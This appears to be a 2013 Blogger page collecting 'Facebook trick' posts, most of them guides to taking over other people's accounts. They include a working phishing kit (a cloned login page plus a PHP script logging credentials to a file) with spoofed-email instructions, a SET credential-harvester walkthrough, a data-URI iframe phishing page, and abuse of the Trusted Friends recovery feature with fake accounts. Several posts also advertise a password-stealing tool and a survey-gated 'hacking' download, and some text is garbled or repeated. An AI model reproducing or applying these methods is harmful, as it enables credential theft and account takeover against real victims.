Latest Games :

SHEKHAR BHALERAO

Showing posts with label FACEBOOK TRICK. Show all posts
Showing posts with label FACEBOOK TRICK. Show all posts

How To Send Friend Requests On Facebook When You Are Blocked

Saturday, 21 September 2013 | 0 comments


How To Send Friend Requests On Facebook When You Are Blocked 

With help of this trick you can send 1000′s of friend requests even if you are blocked. 
So without wasting time let’s start how this trick works?


If you are going to add some unknown person then you need the email address of that person to whom you are going to add. After you get the email address of the personal whom you want to send friend request either from his profile or any other way, follow these steps.

1) Go HERE


Here you will find a place to add a friends through their Emails based on the different Mail Services. But, if you’re thinking of adding too many people then it would be better that you create a contact file.

If you don’t know the easiest way to make contact file then follow these steps.
a) Open new text document (.txt) in notepad.
b) Add all the email addresses separated by a comma ( , ).
c) Now save that file with the extension .vcf
Now this is your contact file.

2) Upload this file to Facebook. and you will be prompted to send friend request.

NOTE : If you don’t know how to upload contact file then follow this step.

Go HERE

In that the last option is of ‘other tools’ in which you will find the next option to upload the file!


3) Click “OK”and You’re done.

Simple yet effective! Your friend request would be sent to desired people.
Continue Reading

Facebook Account Hacking Tool- The Ultimate FYP Trick (2013)

Saturday, 3 August 2013 | 0 comments

Facebook Account Hacking Tool- The Ultimate FYP Trick (2013)


We are back with new facebook account hack Many of you all want to know how to hack someone's Facebook account and get access to their personal information . We are glad to inform you that now you all can easily do that by using a simple trick . This trick is especially made by us and you cannot find it anywhere else . We had already posted another trick of facebook before but this trick is very much different and we had found it yesterday only and can guarantee you all that it will work for all of you with a success rate of almost 99.99% .


Features of this Trick:
 
·  NEVER POSTED BEFORE ON NET

·  FULL PROCEDURE DEMONSTRATED WITH SCREENSHOTS

·  UNLIMITED ACCOUNTS CAN BE HACKED

·  99.99% SUCCESS RATE

·  TAKES TIME OF ONLY ABOUT 15-20 MINUTES

·  EXCLUSIVELY MADE BY US



Click Here to Download

NOTE: Choose Regular Download option...Complete any one Survey & Download your file.
Continue Reading

Facebook Password Decryptor v 4.0

| 0 comments

Facebook Password Decryptor v 4.0


About
Facebook Password Decryptor is the FREE software to instantly recover Facebook account passwords stored by popular Web Browsers and Messengers.It is one of our most popular software with over One Million downloads worldwide.It supports recovering of the stored Facebook login password from most of the popular Internet browsers and messengers.
Here is the complete list of supported applications.
Internet Explorer
Firefox
Google Chrome
Chrome Canary/SXS
CoolNovo Browser
Opera Browser
Apple Safari
Flock Browser
Comodo Dragon Browser
SeaMonkey Browser
Paltalk Messenger
Miranda Messenger
It presents both GUI interface as well as command line version making it useful tool for Penetration testers and Forensic investigators.
It works on both 32-bit & 64-bit platforms starting from Windows XP to latest operating system Windows 8.
Features:

  • Instantly decrypt and recover stored encrypted Facebook account password from Popular Web browsers and Messengers.
  • Comes with both GUI interface as well as Command-line version.
  • Support recovering multiple Facebook accounts stored with any of the supported applications.
  • Automatically discovers the supported applications from their respective install location and recovers the password instantly.
  • Sort feature to arrange the displayed password list by username and password which makes it easy to search through 100's of entries.
  • Save the recovered Facebook password list to HTML/XML/TEXT file for transferring to other system or for future use.
  • Easier and faster to use with its enhanced user friendly interface.
  • Integrated Installer for assisting you in local Installation & Uninstallation.

 


Download

Click Here

Password : www.pkgames.net 


How to Download:


Continue Reading

Hack Facebook Account With Back Track

| 0 comments

Hack Facebook Account With Back Track

Hope You Guys are at your best me to :p but Actually Not Facebook , I Am Going To Reveal A New Facebook Hack For You . This Time I am Using Backtrack 5 (OS)Note :Try At Your Own Risk Any Data Loss or disastrous is Not Our Responsibility !! Lets Hack Your friends Facebook account :p STEP - By - STEP Facebook Hack 
Step 1 :
Open set Tool in Backtrack 5 : To open it follow the step shown in Below Figure 
 

Step 2:

 Time to set the Website Attack Vectors >>>> Below Menu enter your choice
>> 2.Website Attack Vectors and press Enter.


Step 3 : 

Select your Attacking Method , Here i choose 

3. Credential Harvester Attack Method

  
Step 4 :

Step 5: 

Enter the Url: To make a clone to Facebook login page I entered https://www.facebook.com and press enter . As I press enter it will automatically generate a clone page .


Step 6 :
To continue the process you have to put * sign and press enter.
Step 7 : 
              Process will continue as shown in the image above .

Step 8 :
Open terminal and enter ifconfig command . It will shown your ip address . Now copy the ip address


Step 9 :


Open Web Browser and Paste the system ip address into Address bar and it will redirect to the Facebook login page . - See more at: http://www.h4ck3rcracks.com/2013/01/hack-facebook-account-with-back-track.html#sthash.5QdAYa7O.dpuf

Step 9 :


Open Web Browser and Paste the system ip address into Address bar and it will redirect to the Facebook login page . - See more at: http://www.h4ck3rcracks.com/2013/01/hack-facebook-account-with-back-track.html#sthash.5QdAYa7O.dpuf

Step 9 :

Open Web Browser and Paste the system ip address into Address bar and it will redirect to the Facebook login page .
  

Continue Reading

How To Hack Facebook Account Passwords

Saturday, 27 July 2013 | 0 comments

How To Hack Facebook Account Passwords




 
Every Body Question About how can i  hackfacebook? why doesn't my phisher work? how can i send my phisher?...
This is a step by step tutorial for face-book accounts.

1)Go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.

2)Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press ctrl+f and search "action=" without the quotes. you should find this



The big red ring that circles the 
action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document asindex.html

3)Now that we changed the action to 
next.php, we should also make a "next.php". open up notepad again. And write this...
Quote
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Save this as "
next.php"

Note: for security you should rename "
passwords.txt" to something else.
now make a text file called "
passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank.


4)Upload the 3 files  to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files.


5)now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like thisFACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six.


6)Copy the content of an original Facebook friendship invitation email and paste it into a new mail
 DONT SENT YET!
remove the hyperlink from this link:
http:/www.facebook.com/n/?reqs.php
Mark it and push the 
Add hyperlink button



Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty Good Now i believe you are ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it... 

Continue Reading

Make Facebook Account Like Google+ With Circle Hack

| 0 comments

Make Facebook Account Like Google+ With Circle Hack


Google+ introduced the concept of using circles to organise friends.Now a new facebook application called Circle Hack has tried to copy this feature.It provides graphical interface like google+ circles with the Drag and drop feature.But the functionality provided by circle hack is limited as compared to Google+.In google+ you can control who can see your update using the circles but in facebook this function cannot be performed by Circle hack instead you have to Control these settings from Privacy settings.

So, this Circle hack is nothing more than a convenient way to organise your friends in facebook groups.

How To Use Facebook Circle Hack?
  • Login into your Facebook Account
  • Now Open Facebook Circle Hack.
  • Click on the Login Button.It will ask you to grant permissions.
  • After Granting permission by click on Allow button you can see all your friends in the upper half of screen and circles at the bottom half.
  • Now you can create new groups by clicking on the Create List in the first circle.
  • After creating a group Drag and drop your friends from the upper half of the screen to circles.

Continue Reading

Hack Email or Facebook Password using New Software 1000% Working

| 0 comments

Hack Email or Facebook Password using Iframe URI Phishing



First of all download Super Phisher and create a Phishing page. 

To get the URL of the phishing page upload the page on any webhost OR localhost (XAMPP in my case). 

<style> body { margin: 0; overflow: hidden; } </style>

<iframe src=”url link” height=”100%” width=”100%” border=”no” frameBorder=”0″ scrolling=”auto” >Iframe Failed</iframe>

Replace the URL link in the iframe code with the URL of the uploaded phishing page

<style> body { margin: 0; overflow: hidden; } </style>

<iframe src=”http://localhost/facebook/” height=”100%” width=”100%” border=”no” frameBorder=”0″ scrolling=”auto” >Iframe Failed</iframe>

Now visit http://dopiaza.org/tools/datauri/ select Provide Text option in URL Generator page and pasting the modified exploit code (as shown above)

Once the code has been pasted in the Text Area , click on Generate Data URL



We will get the code as shown above after generating the URL. 

In the code generated replce “plain” with “html


Convert the above URL code in short URL by using “www.tinyurl.com
Now send the converted URL to Victim
As soon the Victim enter his credentials you will get the same


Continue Reading

Latest Trick 2013 How to The Hack Your Friend’s Facebook Account By Trusted Friend

| 0 comments

Latest Trick 2013 How to The Hack Your Friend’s Facebook Account By Trusted Friend

 LATEST TRICK 2013 HOW to THE HACK YOUR FRIEND’S FACEBOOK ACCOUNT BY TRUSTED FRIEND

Millions of people are they talking about a How To Hack Facebook Account  That how to Hack a Face book Account. But after the long search a few Person are able to do so that who have much knowledge About HTML coding and professional in Information Technology. But now Hackers are trying to get a best and very easy trick to that Hack the Face book Accounts Friend. Everybody knows that it’s not so much the easy to hack any Facebook accounts. 

Facebook pays a lot of the money to it’s security employees and then experts to reduce hacking of accounts Easily. But hackers have gained the super rage in IT markets and they have the unleashed a trick to hack Facebook account . This trick is not the funny or fake at all.

Later on I will posted many articles on "Hack Face book Accounts" with the key loggers, phishing, social Engraining  Attack ,Using Cookie etc but that Hacking Of Face book Accounts methods are not working fine the now a days. So Hackers have to go the smarter and we have found the new security hole (it’s just a trick) in the Face Book. So now you can Hack Face book easily. Now we can hack the Facebook online with the help of the new password recovery feature of a FB. So keep on reading about this new way for hacking. 

STEP#01

So now here we are going to the misuse this trick to Hack Facebook Account. So now you have to just create 3 the fake Fb accounts then have to send a friend request’s  from those 3 fake accounts to A victim. SO Victim must accept those The friend request OR Contact with your Friend who give you the security code. Now we can use   "THE Three Trusted Friend" feature’s to reset A victims' Face book account password. 

Important Note: The 3 fake account’s must be the  7 day older, then otherwise this Facebook Hack will be not work

After this, so now you are able to the hack your Victim Friend’s Face book Account easily so now just follow These steps given below

Step To The Step Guide That How to a hack Facebook account


STEP#02

The, Now click on The Forgot Facebook Password button like below. Now Facebook system will show you the three solutions to recover your or Victim  password as the shown below

Facebook hacking tools free


STEP#03

So Two are things

1. Email,phone or Facebook username

2. Your name and A friend’s name


If you know anything so enter  there or GO the victim profile link so just copy the username like min

Facebook.com/nomanamzan91

so now copy just nomanramzan91  
and paste in Email,phone or Facebook username


facebook hacking software free

STEP#04

Now After that,yoy click on the No Longer Have Access to These 
 free facebook password hack latest

STEP#05

Then, you can enter a New Email Address which has not to be the used with Any Facebook Account which earlier and then click on a Submit button to proceed to a next step


facebook haking with trusted friend 2013


STEP#06

So now You will be a asked for a security question answer. Then If you know the answer then it’s perfect and if you don’t know then fill it with wrong answers 3 times


facebook hack online free


STEP#07


After these submission or giving the wrong answers, then Facebook Security will show the TRUSTED FRIENDS feature for recover a account
Then Click on a Continue button


free password hack 2013

Then, it will ask you to the select 3 Friends (Now select Friend or your 3 Fake Account’s Name’s) from a shown list and then
  click to the  Continue button after each time you select the selection
After the above all step, then Facebook have to sent the security codes to a each of the 3 accounts which you have selected

Then, Now Login to each of a 3 accounts or ask to friend and note this security’s codes manually and then the fill them in a proper manner ( If they were not found in  a Inbox then check a Spam Folder Also 

STEP#08

Now, then Password Reset Email has been sent to a new Email provided by you given the id previous

That’s final it! You are done the successfully Hacked a victim Account, Now, you have to the  access to your  Friends and Victim Account .




IMPORTANT NOTE: 

Don’t use this for any personal or wrong intention. now This shows a major loophole in a Facebook Security and then the Mindhunter techniques of the Black Hat Hackers.

Continue Reading
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. SHEKHAR BHALERAO - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger